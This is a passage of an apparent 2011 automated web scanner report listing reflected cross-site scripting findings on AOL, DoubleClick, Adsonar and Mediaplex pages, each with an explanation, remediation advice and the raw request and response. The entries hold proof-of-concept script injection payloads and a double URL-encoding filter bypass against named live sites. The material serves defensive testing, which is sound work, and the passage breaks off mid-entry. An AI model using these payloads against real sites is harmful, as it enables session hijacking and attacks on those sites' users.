set-cookie: dcisid=2899066892.3445211725.257032192; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm63 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm63.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="6f70b";4d061b326ea";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90851"%3b5cfb0851bbb was submitted in the REST URL parameter 1. This input was echoed as 90851";5cfb0851bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork90851"%3b5cfb0851bbb/aolcom_terms HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:16 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10547
set-cookie: dcisid=3360935356.688962381.1219365888; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ld64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork90851";5cfb0851bbb";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0463"%3bf8dd5e0d644 was submitted in the REST URL parameter 2. This input was echoed as f0463";f8dd5e0d644 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/f0463"%3bf8dd5e0d644 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:20 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2898935820.660193869.2622619648; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm61 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm61.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="f0463";f8dd5e0d644";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a8e"%3b36d39e4ac68 was submitted in the REST URL parameter 1. This input was echoed as 46a8e";36d39e4ac68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork46a8e"%3b36d39e4ac68/copyright_infringement HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:24 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10567
set-cookie: dcisid=2899132428.408601165.4199612416; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10567


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork46a8e";36d39e4ac68";
s_265.prop2="copyright_infringement";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9271e"%3be315bc2c006 was submitted in the REST URL parameter 2. This input was echoed as 9271e";e315bc2c006 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/9271e"%3be315bc2c006 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:23 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=3361000892.722516813.2628455424; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld65 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ld65.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="9271e";e315bc2c006";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bfe9%2522%253b0e2921fad4a was submitted in the authLev parameter. This input was echoed as 7bfe9";0e2921fad4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=S7bfe9%2522%253b0e2921fad4a&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617350589-Repeat%7C1367689350589%3B%20s_nrgvo%3DRepeat%7C1367689350591%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:36 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="S7bfe9";0e2921fad4a";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /opr/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4481%2522%253bea66b28391e was submitted in the authLev parameter. This input was echoed as f4481";ea66b28391e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /opr/_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=Sf4481%2522%253bea66b28391e&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:44:15 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="Sf4481";ea66b28391e";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.premium/front

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20afb'-alert(1)-'1fde27dc36e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/huffpost.premium/front;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418%7Chomepage%7Cpushdown%7C%7C%7C%7C%7C%7C%7C%7C;sz=970x418;tile=1;ord=18505141?&20afb'-alert(1)-'1fde27dc36e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 05 May 2011 00:59:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 495

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3afe/0/0/%2a/g;44306;0-0;0;19141241;31519-970/418;0/0/0;u=970x418|homepage|pushdown||||||||;~okv=;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown||||||||;sz=970x418;tile=1;;20afb'-alert(1)-'1fde27dc36e=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 2b6fc<script>alert(1)</script>6725a804ac9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=19907672b6fc<script>alert(1)</script>6725a804ac9&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:20 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "19907672b6fc<script>alert(1)</script>6725a804ac9"

   
                                                           </head>
...[SNIP]...

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 1fb20--><script>alert(1)</script>e17c77c9e55 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056911fb20--><script>alert(1)</script>e17c77c9e55&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:18 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3306


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056911fb20--><script>alert(1)</script>e17c77c9e55" -->
...[SNIP]...

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4192a--><script>alert(1)</script>fc1a324ec2a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-14192a--><script>alert(1)</script>fc1a324ec2a&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:23 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3745


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14192a--><script>alert(1)</script>fc1a324ec2a" -->
   
...[SNIP]...

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d70'-alert(1)-'9add617d7d3 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

